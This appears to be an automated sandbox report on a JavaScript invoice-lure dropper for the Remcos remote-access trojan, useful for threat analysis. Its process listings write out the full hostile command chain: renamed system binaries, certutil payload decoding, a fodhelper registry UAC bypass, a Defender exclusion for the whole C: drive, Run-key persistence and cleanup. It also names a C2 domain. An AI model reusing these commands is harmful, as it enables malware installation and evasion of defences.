Malware Analysis Report

2024-12-07 22:44

Sample ID 240718-27hfpsvapd
Target commercial invoice.js
SHA256 dc9834a7967c856395ccc15358635e9cb6fc59e7f2dc2f9f58a9f2e26b717ed5
Tags
execution remcos july 18- yak- uju collection persistence rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dc9834a7967c856395ccc15358635e9cb6fc59e7f2dc2f9f58a9f2e26b717ed5

Threat Level: Known bad

The file commercial invoice.js was found to be: Known bad.

Malicious Activity Summary


Remcos

NirSoft WebBrowserPassView

NirSoft MailPassView

Detected Nirsoft tools

Blocklisted process makes network request

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook accounts

Suspicious use of SetThreadContext

Enumerates physical storage devices

Command and Scripting Interpreter: JavaScript

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Kills process with taskkill

Modifies registry class

Script User-Agent

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-18 23:13

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-18 23:13

Reported

2024-07-18 23:16

Platform

win7-20240705-en

Max time kernel

145s

Max time network

151s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\commercial invoice.js"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\wscript.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Public\alpha.exe | N/A
N/A | N/A | C:\Users\Public\alpha.exe | N/A
N/A | N/A | C:\Users\Public\kn.exe | N/A
N/A | N/A | C:\Users\Public\alpha.exe | N/A
N/A | N/A | C:\Users\Public\kn.exe | N/A
N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A
N/A | N/A | C:\Users\Public\alpha.exe | N/A
N/A | N/A | C:\Users\Public\alpha.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\cmd.exe | N/A
N/A | N/A | C:\Users\Public\alpha.exe | N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Script User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1432 wrote to memory of 1884 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\system32\cmd.exe
PID 1432 wrote to memory of 1884 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\system32\cmd.exe
PID 1432 wrote to memory of 1884 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\system32\cmd.exe
PID 1884 wrote to memory of 408 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\extrac32.exe
PID 1884 wrote to memory of 408 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\extrac32.exe
PID 1884 wrote to memory of 408 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\extrac32.exe
PID 1884 wrote to memory of 2820 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 2820 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 2820 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2820 wrote to memory of 2652 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2820 wrote to memory of 2652 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2820 wrote to memory of 2652 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 1884 wrote to memory of 2672 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 2672 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 2672 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2672 wrote to memory of 2728 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2672 wrote to memory of 2728 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2672 wrote to memory of 2728 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 1884 wrote to memory of 2476 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 2476 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 2476 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2476 wrote to memory of 2692 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2476 wrote to memory of 2692 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2476 wrote to memory of 2692 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 1884 wrote to memory of 768 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\CLEAN.COM
PID 1884 wrote to memory of 768 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\CLEAN.COM
PID 1884 wrote to memory of 768 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\CLEAN.COM
PID 1884 wrote to memory of 768 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\CLEAN.COM
PID 1884 wrote to memory of 3036 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 3036 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 3036 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 1112 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 1112 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1884 wrote to memory of 1112 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\commercial invoice.js"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "

C:\Windows\System32\extrac32.exe

C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "C:\\Users\\Public\\CLEAN.GIF" 9

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "C:\\Users\\Public\\CLEAN.GIF" 9

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12

C:\Users\Public\Libraries\CLEAN.COM

C:\Users\Public\Libraries\CLEAN.COM

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | madibarohillafour.duckdns.org | udp
US | 191.101.130.5:80 | madibarohillafour.duckdns.org | tcp
US | 8.8.8.8:53 | madibarohillafour.duckdns.org | udp
US | 191.101.130.5:80 | madibarohillafour.duckdns.org | tcp
US | 191.101.130.5:80 | madibarohillafour.duckdns.org | tcp

Files

C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat

MD5 e738497b75feb03a11e7b7e763f51037
SHA1 08c5205a67595a5c9e29341d03b6b66da96528e1
SHA256 897173be3c5e872e2d8560f8df743f93c8eb857f8d2d22d3196343c35e90abac
SHA512 3f1812c950e37b3048209e2abdecdfd40650541eefe9722f35771e7fc5723f409dbcffff7325421418948666c312165fa3f182ab3eb5fa442bbee46cb43118bc

C:\Users\Public\alpha.exe

MD5 5746bd7e255dd6a8afa06f7c42c1ba41
SHA1 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256 db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA512 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

\Users\Public\kn.exe

MD5 ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1 ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA256 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA512 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

C:\Users\Public\CLEAN.GIF

MD5 7b55805a9a2ffab38db59819b5c5c274
SHA1 65996c765dfc6a7665c8835edbf1bc4e7a1c9502
SHA256 50a94c852a9b0ba9f6ca217dfa79652b48a2ac41fe2b4578faad2e8e4a95800a
SHA512 3ac6a88d062cb076feb0b3397d12c61b8575763c9bb245d92b2d0b44b10451948a1d284244870c23e4e104575f3ccd09e0e0c7ee43e888a13f384ef1444fa2fb

C:\Users\Public\Libraries\CLEAN.COM

MD5 beacddde34cecf28562a676b781d71e4
SHA1 58ee38081e67d99f494248d682ce907921b1e020
SHA256 80091724af78d5cfdcb8a3a57eaf479f2a49b3479d69e4043a4bef74d0f5ae0b
SHA512 75df3ece32221eea5ec75ec5ff58d9484f6d317c2a55a04fb811a4f25409fd1761077df8e920dd683b9f3d37233f6d1e21e3e06e2a47a6539625d23ae05c83b1

memory/768-39-0x0000000000400000-0x00000000004F8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-18 23:13

Reported

2024-07-18 23:16

Platform

win10v2004-20240709-en

Max time kernel

149s

Max time network

145s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\commercial invoice.js"

Signatures

Remcos

rat remcos

Detected Nirsoft tools

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

NirSoft MailPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

NirSoft WebBrowserPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\wscript.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Libraries\nasppvoG.pif | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Windows \System32\per.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Public\Libraries\CLEAN.COM | N/A

Adds Run key to start application

persistence

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Govppsan = "C:\\Users\\Public\\Govppsan.url" | C:\Users\Public\Libraries\CLEAN.COM | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1328 set thread context of 3556 | N/A | C:\Users\Public\Libraries\CLEAN.COM | C:\Users\Public\Libraries\nasppvoG.pif
PID 1328 set thread context of 2340 | N/A | C:\Users\Public\Libraries\CLEAN.COM | C:\Users\Public\Libraries\CLEAN.COM
PID 1328 set thread context of 4616 | N/A | C:\Users\Public\Libraries\CLEAN.COM | C:\Users\Public\Libraries\CLEAN.COM
PID 1328 set thread context of 1476 | N/A | C:\Users\Public\Libraries\CLEAN.COM | C:\Users\Public\Libraries\CLEAN.COM

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Kills process with taskkill

evasion

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell | C:\Users\Public\ger.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open | C:\Users\Public\ger.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" | C:\Users\Public\ger.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command | C:\Users\Public\ger.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings | C:\Users\Public\ger.exe | N/A

Runs ping.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\PING.EXE | N/A

Script User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A
N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A
N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4336 wrote to memory of 4024 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\system32\cmd.exe
PID 4336 wrote to memory of 4024 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\system32\cmd.exe
PID 4024 wrote to memory of 2456 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\extrac32.exe
PID 4024 wrote to memory of 2456 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\extrac32.exe
PID 4024 wrote to memory of 4332 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4024 wrote to memory of 4332 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4332 wrote to memory of 1420 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 4332 wrote to memory of 1420 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 4024 wrote to memory of 1092 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4024 wrote to memory of 1092 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1092 wrote to memory of 2868 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 1092 wrote to memory of 2868 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 4024 wrote to memory of 1524 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4024 wrote to memory of 1524 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1524 wrote to memory of 1556 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 1524 wrote to memory of 1556 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 4024 wrote to memory of 1328 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\CLEAN.COM
PID 4024 wrote to memory of 1328 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\CLEAN.COM
PID 4024 wrote to memory of 1328 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\CLEAN.COM
PID 4024 wrote to memory of 1984 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4024 wrote to memory of 1984 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4024 wrote to memory of 4036 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4024 wrote to memory of 4036 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1328 wrote to memory of 3556 | N/A | C:\Users\Public\Libraries\CLEAN.COM | C:\Users\Public\Libraries\nasppvoG.pif
PID 1328 wrote to memory of 3556 | N/A | C:\Users\Public\Libraries\CLEAN.COM | C:\Users\Public\Libraries\nasppvoG.pif
PID 1328 wrote to memory of 3556 | N/A | C:\Users\Public\Libraries\CLEAN.COM | C:\Users\Public\Libraries\nasppvoG.pif
PID 1328 wrote to memory of 3556 | N/A | C:\Users\Public\Libraries\CLEAN.COM | C:\Users\Public\Libraries\nasppvoG.pif
PID 1328 wrote to memory of 3556 | N/A | C:\Users\Public\Libraries\CLEAN.COM | C:\Users\Public\Libraries\nasppvoG.pif
PID 3556 wrote to memory of 1540 | N/A | C:\Users\Public\Libraries\nasppvoG.pif | C:\Windows\system32\cmd.exe
PID 3556 wrote to memory of 1540 | N/A | C:\Users\Public\Libraries\nasppvoG.pif | C:\Windows\system32\cmd.exe
PID 1540 wrote to memory of 4648 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\extrac32.exe
PID 1540 wrote to memory of 4648 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\extrac32.exe
PID 1540 wrote to memory of 5008 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 5008 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 2740 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 2740 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 4296 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 4296 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4296 wrote to memory of 5032 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 4296 wrote to memory of 5032 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 1540 wrote to memory of 2424 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 2424 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2424 wrote to memory of 3344 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2424 wrote to memory of 3344 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 1540 wrote to memory of 2052 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 2052 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2052 wrote to memory of 2108 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2052 wrote to memory of 2108 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 1540 wrote to memory of 8 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 8 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 8 wrote to memory of 1476 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\xkn.exe
PID 8 wrote to memory of 1476 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\xkn.exe
PID 1476 wrote to memory of 456 | N/A | C:\Users\Public\xkn.exe | C:\Users\Public\alpha.exe
PID 1476 wrote to memory of 456 | N/A | C:\Users\Public\xkn.exe | C:\Users\Public\alpha.exe
PID 456 wrote to memory of 1220 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\ger.exe
PID 456 wrote to memory of 1220 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\ger.exe
PID 1540 wrote to memory of 4164 | N/A | C:\Windows\system32\cmd.exe | C:\Windows \System32\per.exe
PID 1540 wrote to memory of 4164 | N/A | C:\Windows\system32\cmd.exe | C:\Windows \System32\per.exe
PID 1540 wrote to memory of 2772 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 2772 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2772 wrote to memory of 2072 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe
PID 2772 wrote to memory of 2072 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe
PID 1540 wrote to memory of 3880 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1540 wrote to memory of 3880 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\commercial invoice.js"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "

C:\Windows\System32\extrac32.exe

C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "C:\\Users\\Public\\CLEAN.GIF" 9

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "C:\\Users\\Public\\CLEAN.GIF" 9

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12

C:\Users\Public\Libraries\CLEAN.COM

C:\Users\Public\Libraries\CLEAN.COM

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S

C:\Users\Public\Libraries\nasppvoG.pif

C:\Users\Public\Libraries\nasppvoG.pif

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1D28.tmp\1D29.tmp\1D2A.bat C:\Users\Public\Libraries\nasppvoG.pif"

C:\Windows\System32\extrac32.exe

C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"

C:\Windows\system32\extrac32.exe

extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"

C:\Windows\system32\extrac32.exe

extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"

C:\Windows\system32\extrac32.exe

extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "

C:\Users\Public\xkn.exe

C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "

C:\Users\Public\alpha.exe

"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""

C:\Users\Public\ger.exe

C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""

C:\Windows \System32\per.exe

"C:\\Windows \\System32\\per.exe"

C:\Windows\system32\SystemSettingsAdminFlows.exe

"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettings.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 2

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S

C:\Windows\SysWOW64\extrac32.exe

C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\CLEAN.COM C:\\Users\\Public\\Libraries\\Govppsan.PIF

C:\Users\Public\Libraries\CLEAN.COM

